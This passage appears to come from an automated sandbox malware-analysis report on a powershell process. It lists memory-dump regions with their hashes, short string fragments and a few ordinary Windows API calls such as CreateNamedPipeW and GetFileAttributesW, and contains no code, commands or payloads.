                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`Qpm
                            • API String ID: 0-762164195
                            • Opcode ID: 990dd606ea40a56d5f60ad5ba7f64252783b826acc12a79857058ba5378760da
                            • Instruction ID: d54f5221960218c2ed96a8952ea8fb6e415f290af303197d1835e37f6c850e3b
                            • Opcode Fuzzy Hash: 990dd606ea40a56d5f60ad5ba7f64252783b826acc12a79857058ba5378760da
                            • Instruction Fuzzy Hash: FE122574A11219DFDB64DF64C998BADBBB1BF48315F0085A9E90AA73A0DB309DC1CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: (tm$(tm
                            • API String ID: 0-127711166
                            • Opcode ID: cf84abffa61837084c8695a392535560bd632f0f3ef5500120bd0d87ce7a665c
                            • Instruction ID: ecb33d4bf5e5359a89b58f4da3181f271da4edb322d19a188fafce41d39f04b4
                            • Opcode Fuzzy Hash: cf84abffa61837084c8695a392535560bd632f0f3ef5500120bd0d87ce7a665c
                            • Instruction Fuzzy Hash: 06A1C070A04615CFCB14CFA8C884AAEBBF6EF89315B54866ED515DB391DB34EC06CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: LRpm$pyf^
                            • API String ID: 0-3246084565
                            • Opcode ID: 90eeef5a9ffe4aa51afc123bf9cd6a18f0270717d8e4431b3315fece26328e7b
                            • Instruction ID: 8d8862a7e91332c19b252b6788c7a551f1b2da3785723b4c75865d335fb33f21
                            • Opcode Fuzzy Hash: 90eeef5a9ffe4aa51afc123bf9cd6a18f0270717d8e4431b3315fece26328e7b
                            • Instruction Fuzzy Hash: 9AA12570A04214CFCB18DF68D454AAEBBB6FF89316B54846DE8069B3A1DF35ED46CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J
                            • API String ID: 0-2628089347
                            • Opcode ID: c896737031d4bdd38cb2441b94ecb65fb499da3fa4abcfcfa279efd15c779081
                            • Instruction ID: bcd7b476b69f483eb62930038095d00ccf030138b4bf17dba16db9c8eaeb8a60
                            • Opcode Fuzzy Hash: c896737031d4bdd38cb2441b94ecb65fb499da3fa4abcfcfa279efd15c779081
                            • Instruction Fuzzy Hash: A5A17C34A002188FCB14DFB8D454AAEBBF6FF89311F148569D806AB351DB349D46CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J$`J
                            • API String ID: 0-2628089347
                            • Opcode ID: c4e869f6567fa22d361416d96170f19cf6af18c8b073141015f5a7939157fd14
                            • Instruction ID: a1eab830c312c894c1632a42569775e0b63156473dcf96cd5b1abd6e48cd9b39
                            • Opcode Fuzzy Hash: c4e869f6567fa22d361416d96170f19cf6af18c8b073141015f5a7939157fd14
                            • Instruction Fuzzy Hash: 7C51EF70E08359DFCB15DFB4C8145EEBFB5EF86221F14856AE801EB381DB7499068BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 083C5D88
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284169334.00000000083C0000.00000040.00000001.sdmp, Offset: 083C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_83c0000_powershell.jbxd
                            Similarity
                            • API ID: CreateNamedPipe
                            • String ID:
                            • API String ID: 2489174969-0
                            • Opcode ID: a6ed4d2163fcf7a3be77a8311064633dd4025983735dfe386844b9841863e083
                            • Instruction ID: b387777a6abce1fc3ba4a93f9926091d3bf04560af507aaa2032ae2a19c55b26
                            • Opcode Fuzzy Hash: a6ed4d2163fcf7a3be77a8311064633dd4025983735dfe386844b9841863e083
                            • Instruction Fuzzy Hash: BA51F571D01348AFDB14CFA9D988B9EBBF6BF88304F25842EE414AB261D7746944CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetThreadUILanguage.KERNELBASE ref: 08487142
                            Memory Dump Source
                            • Source File: 00000003.00000002.15285679449.0000000008480000.00000040.00000010.sdmp, Offset: 08480000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8480000_powershell.jbxd
                            Similarity
                            • API ID: LanguageThread
                            • String ID:
                            • API String ID: 243849632-0
                            • Opcode ID: ffc30bb5cc1692c604afa65bdd44eb9f6fce96a30b2b24ba3400a6bddf283ca6
                            • Instruction ID: 1ec0a20e9ca9513bc38fbb58138f6cb617cbb5143e4b31a615b8f457dee68e03
                            • Opcode Fuzzy Hash: ffc30bb5cc1692c604afa65bdd44eb9f6fce96a30b2b24ba3400a6bddf283ca6
                            • Instruction Fuzzy Hash: 7531D070A006448FCB10DFA9C484BAFBBF5EF85315F10886ED119A7751DB74A845CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04896C40
                            Memory Dump Source
                            • Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: b27da980888c694b2e696640ae1f0508a419c21054e7fea04df3f791c773290f
                            • Instruction ID: bc00909a8902adfdd9c922bffebe78af154c63c4f818c4f00faf2fbcc01458e1
                            • Opcode Fuzzy Hash: b27da980888c694b2e696640ae1f0508a419c21054e7fea04df3f791c773290f
                            • Instruction Fuzzy Hash: 732147B1D006599BCB10CF9AD944ADEFBF4FB48724F04851AE818B7600E774A900CFE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04896C40
                            Memory Dump Source
                            • Source File: 00000003.00000002.15259086599.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_4890000_powershell.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 5f083b1355344502ea1975940a08d948755095b1370d52fe124fe56eb64be4a4
                            • Instruction ID: 7ebdee782e2dce06a958e87f11a2ee5e6be966c1410c7383be441bbbe729946d
                            • Opcode Fuzzy Hash: 5f083b1355344502ea1975940a08d948755095b1370d52fe124fe56eb64be4a4
                            • Instruction Fuzzy Hash: 151147B1C006599BCB10CFAAD9846DEFBF4FF48324F04851AE818B7600D774A904CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetThreadUILanguage.KERNELBASE ref: 08487142
                            Memory Dump Source
                            • Source File: 00000003.00000002.15285679449.0000000008480000.00000040.00000010.sdmp, Offset: 08480000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8480000_powershell.jbxd
                            Similarity
                            • API ID: LanguageThread
                            • String ID:
                            • API String ID: 243849632-0
                            • Opcode ID: e525903ea17b1124902b35b1df8968a0195abb1967c09799249811dd01116015
                            • Instruction ID: d9c148c2a9fbb3dfdb88f7dfdf4183a91eeb9b64fd21b946b21b17ef1af3ee4c
                            • Opcode Fuzzy Hash: e525903ea17b1124902b35b1df8968a0195abb1967c09799249811dd01116015
                            • Instruction Fuzzy Hash: 771122B08006888FCB10DF99D588BEFBBF8EB48324F20845AD518A7710D778A944CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 442d198d41629fc2a5d7f9643d1d68e740c7698904ba948bf5e6fed8ad760128
                            • Instruction ID: 5d9d90d29346e3a2a99602ce2d45304385f1221d18ec1fdf6a9381f6a471a619
                            • Opcode Fuzzy Hash: 442d198d41629fc2a5d7f9643d1d68e740c7698904ba948bf5e6fed8ad760128
                            • Instruction Fuzzy Hash: 9BA1A0302107488FC744EB78C451AAEB7A6FFC5349B548D68D5069F2A5DF70BE0A8BD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 74bc025ed9c892341d2b37e7ed583bee53e382ba7b1e156609148480df9e4c69
                            • Instruction ID: f3796aba95d53e1a2ce5417f9e9e4dc936ee24deb3047f05f2f1c9202026c6c5
                            • Opcode Fuzzy Hash: 74bc025ed9c892341d2b37e7ed583bee53e382ba7b1e156609148480df9e4c69
                            • Instruction Fuzzy Hash: F391CF306003099FCB19DB60D855BEE7BB6FF85305F104969E902AB3A5CF79AC45CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: {I
                            • API String ID: 0-670748053
                            • Opcode ID: 15f6ce96dce66395fd6caca8488571b55ee07234be0a819c4a1417b92e1fd9f7
                            • Instruction ID: 08cc0b69e63bb18f018a098fdc3e49f8b9fd9cff86324245597a86704bdef6c6
                            • Opcode Fuzzy Hash: 15f6ce96dce66395fd6caca8488571b55ee07234be0a819c4a1417b92e1fd9f7
                            • Instruction Fuzzy Hash: 82919130A14258DFC704DF68C0409AEBBF6EF88315F44896DE8059B365DB75ED46CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: {I
                            • API String ID: 0-670748053
                            • Opcode ID: 2d26f43699056b22e832387147688f4f9206b93ab095ad3c630a650b93c292dd
                            • Instruction ID: acab32996832f587651c6bbfe78ae4f213b881d323b7e92237be0cac8b670a14
                            • Opcode Fuzzy Hash: 2d26f43699056b22e832387147688f4f9206b93ab095ad3c630a650b93c292dd
                            • Instruction Fuzzy Hash: 94918030A14259DFC704DF68C040AAEBBF6EF88319F44896DE8069B365CB75ED46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 371528934adcb36a8d76c48750c8d5c5ff6a45a3510824bda2fd185b62c8d992
                            • Instruction ID: 3ef79d579e45bdfbf229e6e16fef6819e257e2ad7f6a903953a88b155e056256
                            • Opcode Fuzzy Hash: 371528934adcb36a8d76c48750c8d5c5ff6a45a3510824bda2fd185b62c8d992
                            • Instruction Fuzzy Hash: 2151D331705360CFCB159B39D41866E7BEAEF86245B44896EE906CB3A2DF38DC45CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: LRpm
                            • API String ID: 0-2206377556
                            • Opcode ID: edd90e2dd8c6f9f4027b2fafc16c0e38c01f0c2ab4cc160fcc62ef9447014c5f
                            • Instruction ID: 6ac14ded7c8f6523d10467761f407a773ae833f9b4bf9ebfd13d2b5aadf3fb76
                            • Opcode Fuzzy Hash: edd90e2dd8c6f9f4027b2fafc16c0e38c01f0c2ab4cc160fcc62ef9447014c5f
                            • Instruction Fuzzy Hash: BD515730A05315CFDB14DFA4D559BAEBBB6EF85316F54446AE402AB390CB399D42CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8490000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: l<@l
                            • API String ID: 0-3384338725
                            • Opcode ID: bf455b549129e9b489ee2fda3aa8325ea80f6348feefbbe363112ce830e487a8
                            • Instruction ID: 830de212346a5b2ff14e00a4e6e0c303b6e824e3657865a2c67749f89e8a3030
                            • Opcode Fuzzy Hash: bf455b549129e9b489ee2fda3aa8325ea80f6348feefbbe363112ce830e487a8
                            • Instruction Fuzzy Hash: 85416231B002149FDF24CF65C854BAEBBB6AF88351F10856DE946AB790EBB1EC41CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 0540817a616b0a67535d3ff1a56f3f629b5f48ea0d8da502c1e0a28d3ec912d4
                            • Instruction ID: 19665f9188282ccfbe9400b026c20c5a3bda4fc7416814c93dcfd31cd60bda08
                            • Opcode Fuzzy Hash: 0540817a616b0a67535d3ff1a56f3f629b5f48ea0d8da502c1e0a28d3ec912d4
                            • Instruction Fuzzy Hash: B44113712143498FC710DB65D88199EBBEAFF853087008EA9E6068B361DF71BC09CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 8405c12ff3ad12634ce8dad19aef0ffbac52daa62f6975188c81b273c44faab9
                            • Instruction ID: 187d73f813e7a5d4c9b4f562f63c478a87048b7ac197337da2c9e1b773986543
                            • Opcode Fuzzy Hash: 8405c12ff3ad12634ce8dad19aef0ffbac52daa62f6975188c81b273c44faab9
                            • Instruction Fuzzy Hash: 45314835A04214CFCB149BA8C458AEEBBB6EF88315F14842DD906A7790DB719881CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ;'
                            • API String ID: 0-2106183375
                            • Opcode ID: 40e4416b66bdcf056414fc32fe734ab81cf962ce13b86a6573515ba8a1d16d57
                            • Instruction ID: 39a27d43b8633ff330644cab92d322e6c53f559ae56cdfff28133259e2237ab4
                            • Opcode Fuzzy Hash: 40e4416b66bdcf056414fc32fe734ab81cf962ce13b86a6573515ba8a1d16d57
                            • Instruction Fuzzy Hash: A4310372608329EFCB168F25C8006AFBBE5EF88351F04855EF9449B291CB35ED15CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: fe28f1df1533306059d07c47c58255fd71e6e1539f96eb95812b3fd934914606
                            • Instruction ID: cb2e1a046949b7b2ec5d2c0d2bc3a2ca97759c6d8e9d4f2a1ff731ca51fa09ba
                            • Opcode Fuzzy Hash: fe28f1df1533306059d07c47c58255fd71e6e1539f96eb95812b3fd934914606
                            • Instruction Fuzzy Hash: E321C53571A2A04FCB176738A4185BD7FB5EEC622230D01EED886CB753CA248D06C7A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 79925ac582e48c48c56d57f02c52b8121368232e8bb8ad920b68b7733819e429
                            • Instruction ID: f2b3d050c9af605acc2248fcdacb1ff68046e3e8dbb5f28bf02bcdd5b530832f
                            • Opcode Fuzzy Hash: 79925ac582e48c48c56d57f02c52b8121368232e8bb8ad920b68b7733819e429
                            • Instruction Fuzzy Hash: DA2105307002489BCB15DFA8D45499EBBFAFFC5361700852DE909EB351DB349D46C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: `J
                            • API String ID: 0-3750417106
                            • Opcode ID: 189851135365b2bdcfcf2606613a8c103f25da1e108003ecee0b603b69fc12d0
                            • Instruction ID: b78a567a3d7706173ff74b17ea2a964ee8ff09b005d5834ae9aeead8554f588d
                            • Opcode Fuzzy Hash: 189851135365b2bdcfcf2606613a8c103f25da1e108003ecee0b603b69fc12d0
                            • Instruction Fuzzy Hash: EC213934A00214DFDB189BB4C914AADBBB6EFCC315F14846DE902A7391CB759C42CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9bf27f0dff60644d075ddc3201081d87e2b9b433197661c935b4f0cf0d21eeee
                            • Instruction ID: 5ce0eb10b864f87656fba1575f3a3074e9c8f09b0e6454d9df4a799d56dfa973
                            • Opcode Fuzzy Hash: 9bf27f0dff60644d075ddc3201081d87e2b9b433197661c935b4f0cf0d21eeee
                            • Instruction Fuzzy Hash: 65D15270614205AFC744EB78C951AAEB7A6EF84208F109E6DD5069F382EF71AD49CBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f8219d8c6a9a2d01facdaa21bebd9287ea1e439e2c4a8ec7afbb0e9ed9e47146
                            • Instruction ID: 9d763eb6472aeed21c778676384e8fbf06e31660c2234bca05ccc7f3fe27851d
                            • Opcode Fuzzy Hash: f8219d8c6a9a2d01facdaa21bebd9287ea1e439e2c4a8ec7afbb0e9ed9e47146
                            • Instruction Fuzzy Hash: 03C15B70A04259CFDB15CFA8C444BAEBBB2BF85305F548869E406AB355DB34ED85CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15285845549.0000000008490000.00000040.00000010.sdmp, Offset: 08490000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8490000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b85c6ed16899bc19d381c762b2e0ecfce74a760df93c07762321590cf4f2a18f
                            • Instruction ID: ca8a6e2b2c643bfb2ce10ede3d06a7ae80beb84549201c867714f01178cd2bc0
                            • Opcode Fuzzy Hash: b85c6ed16899bc19d381c762b2e0ecfce74a760df93c07762321590cf4f2a18f
                            • Instruction Fuzzy Hash: B391BC343413009FDB29AB349C51BAE7BA3ABC6701F24896EE6469F3D1DE76DC428740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a4ea537fd8a9ef7fe306239b82314f07740a666977f51ece35fdc4b00440f163
                            • Instruction ID: c26394a0a1bb970be25ea6e712a9daffba9a0528ff2a83803b97dc58d9f7ca6c
                            • Opcode Fuzzy Hash: a4ea537fd8a9ef7fe306239b82314f07740a666977f51ece35fdc4b00440f163
                            • Instruction Fuzzy Hash: 46B10834A10259CFDB64EF64C898BADB7F6BF48316F148599E44AA73A0DB349D81CF40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0deef60fcd857e680047c119686c2fd8ef6552c340e4eda6a0bddfa3611697ba
                            • Instruction ID: 243fdb974c58680a4fa2da571b8391c394281f224c945bf0c522a3bcb6929618
                            • Opcode Fuzzy Hash: 0deef60fcd857e680047c119686c2fd8ef6552c340e4eda6a0bddfa3611697ba
                            • Instruction Fuzzy Hash: 66914030A10209DFCB14EF65C485AAEB7F6FF84315F144968E4429B2A1DB74EC86CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0809d6dcca5e6a8651bb5413c7d277aa5b1753b635d2731ebdea048c6736cebc
                            • Instruction ID: 6c0ebe4d22e5b74722a0981ecc4e7c26ba4ba3b7c3d1c276e4c3d5c4cbf9f560
                            • Opcode Fuzzy Hash: 0809d6dcca5e6a8651bb5413c7d277aa5b1753b635d2731ebdea048c6736cebc
                            • Instruction Fuzzy Hash: 47818E302106498FC754EB78C441AAEB7A6FFC5348B548D6CD5069F2A5DF70BE0A8BD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8f49075a76987616c86c1a7785d9e9fd720e297927037ead2399281568b617a
                            • Instruction ID: 87a3ba3e48bcd68ebf749286b6e4ddbaed6056f560d66e19dfdf311f897b85da
                            • Opcode Fuzzy Hash: e8f49075a76987616c86c1a7785d9e9fd720e297927037ead2399281568b617a
                            • Instruction Fuzzy Hash: 81917D70A00259DFCB15DFA4C484BEEBBF2EF48305F548569E806AB355CB74AE49CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f212604e7542361c7d1ea7a09b2e241818518a1026ef257a0f5007fee97e534a
                            • Instruction ID: 1cd943c974ac622bd930fe54cfd627af849fb88366c6f1c5570d0a596a02e052
                            • Opcode Fuzzy Hash: f212604e7542361c7d1ea7a09b2e241818518a1026ef257a0f5007fee97e534a
                            • Instruction Fuzzy Hash: 6E7127302043859FC3159B39D85579EBBE5EF82324F108A6AE5528B3C2CF79E845CF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2b79f2d8fbcbd827a68f6f3719dcf00d861c071e9b6a2224c73a38bf99f27a10
                            • Instruction ID: d0179c0c45f73211f4a0b5c84fadfd959ee8428165b62d7d0ce12a689e9df8b5
                            • Opcode Fuzzy Hash: 2b79f2d8fbcbd827a68f6f3719dcf00d861c071e9b6a2224c73a38bf99f27a10
                            • Instruction Fuzzy Hash: C8717C35A10219CFCB14EBA8C480BEDB7B2FF88325F158569D501AB355DB72ED86CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e13bdfbd85e9e91c58b6f6468c01a26e053ef73f1c6aced03abc43c7fa39d1ba
                            • Instruction ID: 95330c3e037e8e5fd4cf17732235eaf7d7e343cf4a714e1919eb4bbb44ec2e81
                            • Opcode Fuzzy Hash: e13bdfbd85e9e91c58b6f6468c01a26e053ef73f1c6aced03abc43c7fa39d1ba
                            • Instruction Fuzzy Hash: 0A7139B4E00209AFDB16DBB0D852BEEBBB2EB89301F114529EA057B790CF756D45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d925ecbdecdb6820daf7c46540a74fe42d5f61b36535498d94d5693b2ffbe6f1
                            • Instruction ID: 141325b94b1b4dca2f6fe469c9b118f604a5d985b5f647f162d8a83fc90383cc
                            • Opcode Fuzzy Hash: d925ecbdecdb6820daf7c46540a74fe42d5f61b36535498d94d5693b2ffbe6f1
                            • Instruction Fuzzy Hash: 997129B4E00209AFDB15DBB0D852BEEBBB2EB88301F514529EA057B790CF756E45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8420000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a8559b0778df88bb4d3ab3203a01ef65ef5a713d053466f34c275119943d612e
                            • Instruction ID: 5ad5f982228f7b6b09a54729243247b0ecb8d3075c4417bb328083652c9f27ff
                            • Opcode Fuzzy Hash: a8559b0778df88bb4d3ab3203a01ef65ef5a713d053466f34c275119943d612e
                            • Instruction Fuzzy Hash: 2751AD74200705DFC3249B39D485B6ABBE2EB85324F108A2DE5269B7C1CB79E945CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_8260000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
